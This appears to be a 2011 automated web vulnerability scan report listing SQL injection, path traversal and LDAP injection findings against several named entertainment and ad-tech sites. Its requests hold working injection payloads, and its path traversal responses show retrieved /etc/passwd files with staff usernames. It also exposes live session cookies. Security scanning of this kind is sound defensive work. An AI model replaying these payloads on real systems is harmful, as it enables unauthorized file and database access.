X-Powered-By: PHP/5.3.5
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 0


1.21. http://www.zap2it.com/zap-partners-iframe,0,2002648.blurb [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.zap2it.com
Path:   /zap-partners-iframe,0,2002648.blurb

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /zap-partners-iframe,0,2002648.blurb?1111&1%20and%201%3d1--%20=1 HTTP/1.1
Host: www.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=88001f2-12fdf8e677a-54f87f38-1; __qca=P0-1518749982-1305125748755; s_cc=true; s_dslv=1305125756067; s_dslv_s=First%20Visit; s_path=current; gpv_pp=Pop2it%20-%20zap2it%20-%20Blogs.%20-%20Cannes%20Film%20Festival%3A%20Uma%20Thurman%2C%20Jude%20Law%2C%20Salma%20Hayek%20and%20more%20kick%20things%20off; s_sq=%5B%5BB%5D%5D; __utmz=256511380.1305125756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=256511380.2118048213.1305125756.1305125756.1305125756.1; __utmc=256511380; __utmb=256511380.1.10.1305125756; rsi_segs=B08725_10011|B08725_10030|B08725_10070|D08734_70008|D08734_72078

Response 1

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.zap2it.com/w3c/p3p.xml", CP="ALL DSP LAW DEVa TAIa OUR BUS UNI CNT STA PRE"
Content-Type: text/html
X-Instance-Name: i2s27z2n1
Last-Modified: Tue, 19 Apr 2011 22:40:26 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=281
Date: Wed, 11 May 2011 15:51:25 GMT
Connection: close
Content-Length: 23742


<html>
<head>
<title>Zap2it Partners</title>
<base target="_top">
<style type="text/css" media="all">@import "http://mserv.zap2it.com/redesign2010/oxygen2010.css";
body { background: transpar
...[SNIP]...
<a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/charlie-sheen-denise-richards-kids-child-custody-visitation-lawyers-office-sam-and-lola-daughters-warlock/'>Charlie and Denise FACE OFF Over Their Kids</a></p>
   

   <p id="rss-item-2" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/tapout-lawsuit-mma-cremation-mask-death-body-skyscrape-punkass-vials-ashes-remains-funeral-memorial-service/'>MMA Lawsuit -- You JACKED My Brother's Remains!!</a></p>
   

   <p id="rss-item-3" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/arnold-schwarzenegger-speaks-on-separation-maria-shriver-love-each-other-video/'>Arnold Speaks -- 'We Love Each Other Very Much'</a></p>
   

   <p id="rss-item-4" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/kobe-bryant-lawsuit-la-lakers-nba-basketball-counterfeit-staples-center-trademark-blake-griffin/'>Kobe Bryant Lawsuit -- Something Stinks at Staples</a></p>
   

   <p id="rss-item-5" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/10/arnold-schwarzenegger-maria-shriver-split-separation-divorce-governator-back-together/'>Arnold: I Want Maria Back!!!</a></p>
   


   <p class="rail-list-item"><a target="new" rel="nofollow" href="/zap-tmz-xmlfeed,0,2388713.xmlfeed" target="">More...</a></p>

</div>




</td>


<td class="item">    

<a target="new" href="http://www.toofab.com" rel="nofollow"><img src="http://www.zap2it.com/media/thumbnails/xmlfeed/2010-09/56211268-17081141.gif" alt="TooFab" border="0" width="130" height="31" /></a>















       
   
   
   
       
   
       
   




<!-- HACK: Work around to provide a body for this tag -->
<!-- so that the doAfterBody method is executed. -->

<!-- end HACK -->
<div class="rail-list">

   <p id="rss-item-1" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.toofab.com/2011/05/11/cannes-film-festival-red-carpet-french-riviera-rachel-mcadam
...[SNIP]...

Request 2

GET /zap-partners-iframe,0,2002648.blurb?1111&1%20and%201%3d2--%20=1 HTTP/1.1
Host: www.zap2it.com
Proxy-Connection: keep-alive
Referer: http://www.zap2it.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=88001f2-12fdf8e677a-54f87f38-1; __qca=P0-1518749982-1305125748755; s_cc=true; s_dslv=1305125756067; s_dslv_s=First%20Visit; s_path=current; gpv_pp=Pop2it%20-%20zap2it%20-%20Blogs.%20-%20Cannes%20Film%20Festival%3A%20Uma%20Thurman%2C%20Jude%20Law%2C%20Salma%20Hayek%20and%20more%20kick%20things%20off; s_sq=%5B%5BB%5D%5D; __utmz=256511380.1305125756.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=256511380.2118048213.1305125756.1305125756.1305125756.1; __utmc=256511380; __utmb=256511380.1.10.1305125756; rsi_segs=B08725_10011|B08725_10030|B08725_10070|D08734_70008|D08734_72078

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
P3P: policyref="http://www.zap2it.com/w3c/p3p.xml", CP="ALL DSP LAW DEVa TAIa OUR BUS UNI CNT STA PRE"
Content-Type: text/html
X-Instance-Name: i2s29z1n1
Last-Modified: Tue, 19 Apr 2011 22:40:26 GMT
Vary: Accept-Encoding
Cache-Control: private, max-age=300
Date: Wed, 11 May 2011 15:51:25 GMT
Connection: close
Content-Length: 23695


<html>
<head>
<title>Zap2it Partners</title>
<base target="_top">
<style type="text/css" media="all">@import "http://mserv.zap2it.com/redesign2010/oxygen2010.css";
body { background: transpar
...[SNIP]...
<a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/tapout-lawsuit-mma-cremation-mask-death-body-skyscrape-punkass-vials-ashes-remains-funeral-memorial-service/'>MMA Lawsuit -- You JACKED My Brother's Remains!!</a></p>
   

   <p id="rss-item-2" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/arnold-schwarzenegger-speaks-on-separation-maria-shriver-love-each-other-video/'>Arnold Speaks -- 'We Love Each Other Very Much'</a></p>
   

   <p id="rss-item-3" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/kobe-bryant-lawsuit-la-lakers-nba-basketball-counterfeit-staples-center-trademark-blake-griffin/'>Kobe Bryant Lawsuit -- Something Stinks at Staples</a></p>
   

   <p id="rss-item-4" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/10/arnold-schwarzenegger-maria-shriver-split-separation-divorce-governator-back-together/'>Arnold: I Want Maria Back!!!</a></p>
   

   <p id="rss-item-5" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.tmz.com/2011/05/11/arnold-schwarzenegger-maria-shriver-split-seperate-divorce-marriage-napa-valley-yountville-terminator-meadowood-french-laundry/'>Arnold -- BRO-MANTIC Man Party After Separation</a></p>
   


   <p class="rail-list-item"><a target="new" rel="nofollow" href="/zap-tmz-xmlfeed,0,2388713.xmlfeed" target="">More...</a></p>

</div>




</td>


<td class="item">    

<a target="new" href="http://www.toofab.com" rel="nofollow"><img src="http://www.zap2it.com/media/thumbnails/xmlfeed/2010-09/56211268-17081141.gif" alt="TooFab" border="0" width="130" height="31" /></a>















       
   
   
   
       
   
       
   




<!-- HACK: Work around to provide a body for this tag -->
<!-- so that the doAfterBody method is executed. -->

<!-- end HACK -->
<div class="rail-list">

   <p id="rss-item-1" class="rail-list-item"><a target="new" rel="nofollow" href='http://www.toofab.com/2011/05/11/cannes-film-festival-red-carpet-fre
...[SNIP]...

2. File path traversal  previous  next
There are 3 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:



2.1. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featurecat parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.starpulse.com
Path:   /feed/include/feature.inc.12-03-2010.php

Issue detail

The featurecat parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload News../../../../../../../../etc/passwd%00News was submitted in the featurecat parameter. The requested file was returned in the application's response.

Request

GET /feed/include/feature.inc.12-03-2010.php?featuretype=Friends&page_channel=News&featurecat=News../../../../../../../../etc/passwd%00News&feedoffset=0&featureid=Friends1&dwrite=1 HTTP/1.1
Host: cdn.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 14:58:11 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n29 ( iad-agg-n33), ms iad-agg-n33 ( origin>CONN)
Cache-Control: max-age=300
Expires: Wed, 11 May 2011 15:03:11 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 1745

document.write("<ul><li># $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $\n#\nroot:*:0:0:Charlie &:/root:/bin/csh\ntoor:*:0:0:Bourne-again Superuser:/root:\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System &:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin\nkmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin\ngames:*:7:13:Games pseudo-user:/usr/games:/usr/sb
...[SNIP]...
:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico\npop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin\nwww:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin\nnobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\n\ncklewin:*:100:100:Christopher Klewin -Sysadmin:/home/cklewin:/usr/local/bin/bash\npcartier:*:101:101:Paul Cartier -Staff:/home/pcartier
...[SNIP]...

2.2. http://cdn.starpulse.com/feed/include/feature.inc.12-03-2010.php [featuretype parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://cdn.starpulse.com
Path:   /feed/include/feature.inc.12-03-2010.php

Issue detail

The featuretype parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload Friends../../../../../../../../etc/passwd%00Friends was submitted in the featuretype parameter. The requested file was returned in the application's response.

Request

GET /feed/include/feature.inc.12-03-2010.php?featuretype=Friends../../../../../../../../etc/passwd%00Friends&page_channel=News&featurecat=News&feedoffset=0&featureid=Friends1&dwrite=1 HTTP/1.1
Host: cdn.starpulse.com
Proxy-Connection: keep-alive
Referer: http://www.starpulse.com/news/index.php/2011/05/10/lady_gaga_to_launch_cannes_film_festiv
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Wed, 11 May 2011 14:57:02 GMT
Server: PWS/1.7.2.1
X-Px: ms iad-agg-n29 ( iad-agg-n18), ms iad-agg-n18 ( origin>CONN)
Cache-Control: max-age=300
Expires: Wed, 11 May 2011 15:02:02 GMT
Age: 0
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 1745

document.write("<ul><li># $FreeBSD: src/etc/master.passwd,v 1.40.22.1.2.1 2009/10/25 01:10:29 kensmith Exp $\n#\nroot:*:0:0:Charlie &:/root:/bin/csh\ntoor:*:0:0:Bourne-again Superuser:/root:\ndaemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin\noperator:*:2:5:System &:/:/usr/sbin/nologin\nbin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin\ntty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin\nkmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin\ngames:*:7:13:Games pseudo-user:/usr/games:/usr/sb
...[SNIP]...
:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico\npop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin\nwww:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin\nnobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin\n\ncklewin:*:100:100:Christopher Klewin -Sysadmin:/home/cklewin:/usr/local/bin/bash\npcartier:*:101:101:Paul Cartier -Staff:/home/pcartier
...[SNIP]...

2.3. http://www2.glam.com/app/site/affiliate/viewChannelModule.act [mName parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www2.glam.com
Path:   /app/site/affiliate/viewChannelModule.act

Issue detail

The mName parameter is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload viewAdJs../../../../../../../../etc/passwd%00viewAdJs was submitted in the mName parameter. The requested file was returned in the application's response.

Request

GET /app/site/affiliate/viewChannelModule.act?mName=viewAdJs../../../../../../../../etc/passwd%00viewAdJs&affiliateId=8156650&adSize=970x66 HTTP/1.1
Host: www2.glam.com
Proxy-Connection: keep-alive
Referer: http://www.shefinds.com/2011/cannes-film-festival-begins-today-time-to-reflect-on-last-years-best-dressed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1304359345.1304361407.4; ctags=%3bct%3dbarhp

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Content-Type: text/html; charset=UTF-8
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Cache-Control: max-age=3600
Date: Wed, 11 May 2011 14:56:14 GMT
Connection: close
Content-Length: 2009

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwa
...[SNIP]...

3. LDAP injection  previous  next
There are 4 instances of this issue:

Issue background

LDAP injection arises when user-controllable data is copied in an unsafe way into an LDAP query that is performed by the application. If an attacker can inject LDAP metacharacters into the query, then they can interfere with the query's logic. Depending on the function for which the query is used, the attacker may be able to retrieve sensitive data to which they are not authorised, or subvert the application's logic to perform some unauthorised action.

Note that automated difference-based tests for LDAP injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Issue remediation

If possible, applications should avoid copying user-controllable data into LDAP queries. If this is unavoidable, then the data should be strictly validated to prevent LDAP injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into queries, and any other input should be rejected. At a minimum, input containing any LDAP metacharacters should be rejected; characters that should be blocked include ( ) ; , * | & = and whitespace.


3.1. http://ar.voicefive.com/bmx3/broker.pli [pid parameter]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://ar.voicefive.com
Path:   /bmx3/broker.pli

Issue detail

The pid parameter appears to be vulnerable to LDAP injection attacks.

The payloads 3781f7a06b07f536)(sn=* and 3781f7a06b07f536)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be being incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=3781f7a06b07f536)(sn=*&PRAd=253735206&AR_C=181106363 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=46&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 14:19:04 2011&prad=253735207&arc=194941163&; UID=875e3f1e-184.84.247.65-1303349046

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 May 2011 15:13:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_3781f7a06b07f536&#41;&#40;sn=exp=1&initExp=Wed May 11 15:13:07 2011&recExp=Wed May 11 15:13:07 2011&prad=253735206&arc=181106363&; expires=Tue 09-Aug-2011 15:13:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305126787; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=3781f7a06b07f536)!(sn=*&PRAd=253735206&AR_C=181106363 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://news.lalate.com/2011/05/11/shingles-not-pink-eye-tony-la-russa-health-condition-revealed/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p91136705=exp=2&initExp=Tue Apr 26 18:40:08 2011&recExp=Wed Apr 27 12:40:09 2011&prad=296638419&arc=206710287&; ar_p92429851=exp=4&initExp=Tue Apr 26 18:36:13 2011&recExp=Wed Apr 27 12:40:21 2011&prad=296638425&arc=200912704&; ar_p84552060=exp=1&initExp=Wed Apr 27 19:31:14 2011&recExp=Wed Apr 27 19:31:14 2011&prad=2108505&arc=4477116&; ar_p90452457=exp=1&initExp=Thu May 5 00:58:23 2011&recExp=Thu May 5 00:58:23 2011&prad=310177527&arc=211671722&; ar_p85001580=exp=1&initExp=Tue May 10 13:28:54 2011&recExp=Tue May 10 13:28:54 2011&prad=62165328&arc=41861280&; ar_p82806590=exp=2&initExp=Thu Apr 28 21:29:14 2011&recExp=Tue May 10 18:23:11 2011&prad=58779362&arc=41840773&; ar_p97174789=exp=46&initExp=Sun Apr 24 12:09:48 2011&recExp=Wed May 11 14:19:04 2011&prad=253735207&arc=194941163&; UID=875e3f1e-184.84.247.65-1303349046

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 11 May 2011 15:13:07 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_3781f7a06b07f536&#41;!&#40;sn=exp=1&initExp=Wed May 11 15:13:07 2011&recExp=Wed May 11 15:13:07 2011&prad=253735206&arc=181106363&; expires=Tue 09-Aug-2011 15:13:07 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1305126787; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

3.2. http://cspix.media6degrees.com/orbserv/hbpix [rdrlst cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://cspix.media6degrees.com
Path:   /orbserv/hbpix

Issue detail

The rdrlst cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the rdrlst cookie. These two requests resulted in different responses, indicating that the input may be being incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /orbserv/hbpix?pixId=1598&pcv=45&ptid=100&tpv=00&tpu=4dab4fa85facd099&curl=http%3a%2f%2fwww.medicinenet.com%2fpink_eye%2farticle.htm HTTP/1.1
Host: cspix.media6degrees.com
Proxy-Connection: keep-alive
Referer: http://s7.addthis.com/static/r07/sh42.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lkkjj40zijsvn5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrf00; acs=016020a0e0f0g0h1ljtllpxzt117s3uxzt1tr37xzt1tr37xzt117s3uxzt117rw8; adh=1lkkxr8160a4ka20103r018twhJPTGt00gg5452rf011et018qzlZAsw500gg2f52rc011qy047t/iBG61e00gej07rxkxOK2C00gegz7pwZhKq0500gef6mLlY5BlsL003xfa54rg012pw01RcyZZBCFM00ei4o4l12012pw01Ra2uRD8cN00ei2y58j30136z01Q02eRPDiG00eh4b4tmb012v701QWYNRLUMp00egcp4tm3012v701QWJzhCSHC00egcf4w5q011qy01mLbKRCxkE003xf64qj9010gs02QopkpBIIf0002zwOyHUBHBSQ000000; clid=2ljtllp01170xrd52zkwjuxh17san01o3n070k0r51a; rdrlst=*)(sn=*; sglst=2280sbpelkxlm5026sw00f3m000k00500dsnlkxlm503s3e00q3n070k0q50qarllkxlm503s3e00q3n070k0q50qcg5lkxlm5026sw00q3n070k0q50q9rslkkpke0go550183n070k0r518am5lkkxr8002zw0113n070k0r511cd4lkxlm5026sw00f3m000k00500crglkxlm5026sw00q3n070k0q50qcnolkxlm5026sw00q3n070k0q50qabelkxlm5026sw00q3n070k0q50qdd8lkxlm5026sw00f3m000k00500cy2lkxlm5026sw00q3n070k0q50qaoplkb5u209jqc0063e000j00500cnxlkxlm503s3e00q3n070k0q50qe3qll1dpj000000033n030k03503bq3lkxlm5026sw00q3n070k0q50qbvplkxlm5026sw00f3m000k00500aoilkxlm503s3e00n3n000k00500942lkb5u20mfs300o3l000k005008ndlkb5u20mfs300o3l000k005009ullkxlm503s3e00n3n000k00500bvclkxlm5026sw00q3n070k0q50qc5flkxlm5026sw00q3n070k0q50q56blkb5u20mfs300o3l000k00500bjqlkxlm5026sw00q3n070k0q50qawklkxlm5026sw00q3n070k0q50qasulkb5u209jqc0063e000j00500crplkxlm503s3e00n3n000k00500asqlkxlm5026sw00q3n070k0q50qc5rlkov6e0000000t3n070k0r50taw8lkxlm503s3e00q3n070k0q50qc60lkxlm5026sw00q3n070k0q50qdc4lkxlm5026sw00q3n070k0q50qd26lkxlm5026sw00q3n070k0q50qdnjlkxlm503s3e00q3n070k0q50qcbclkxlm5026sw00q3n070k0q50qc85lkxlm5026sw00q3n070k0q50qcsslkxlm503s3e00q3n070k0q50qc80lkb5u209jqc0063e000j00500ag2lkd7nq0o68m01d3n070k0r51ac1elkxlm5026sw00q3n070k0q50qc81lkkpke0cw1r00i3l000k005009grlkxlm5026sw00q3n070k0q50qc8flkxlm5026sw00q3n070k0q50qa6slkkpke0cw1r00i3l000k00500dnalkxlm5026sw00q3n070k0q50q9z6lkxlm5026sw00q3n070k0q50qdbtlkxlm5026sw00q3n070k0q50q9q4lkxlm5026sw00q3n070k0q50qdyllkxlm5026sw00q3n070k0q50q0kllklhm40c4010053l000k005009q5lkb5u20mfs300o3l000k00500b3zlkxlm503s3e00n3n000k005000t7ljyxb412gl801l3n070k0r51adgflkkpke0f2un0183n070k0r5189mjlkxlm5026sw00f3m000k00500bo0lkb5u20q7vh01b3n000k00500bo1lkkyy00cmo50093l000k005009pglkxlm5026sw00q3n070k0q50qcwalkxlm5026sw00q3n070k0q50qd86lklhm40c4010053l000k00500d84lkxlm5026sw00q3n070k0q50qdqllkxlm5026sw00q3n070k0q50qdz3lkxlm5026sw00f3m000k00500cm6lkxlm5026sw00q3n070k0q50qcxdlkxlm503s3e00q3n070k0q50q719lkb5u20omkz00w3n070k0q50r71alkkpke0cw1r00i3l000k00500ctplkxlm5026sw00q3n070k0q50qcc3lkxlm5026sw00q3n070k0q50qdgilkb5u209jqc0063e000j00500cthlkxlm5026sw00q3n070k0q50q4wclkb5u20q7vh00t3n000k005005mrlkb5u20mfs300o3l000k00500a0ulkxlm503s3e00n3n000k00500arilkxlm5026sw00f3m000k00500e0yll1dpj000000033n030k03503bwjlkkyy00gerj00z3n070k0r50zcbplkxlm5026sw00q3n070k0q50q9gelkxlm503s3e00n3n000k00500; 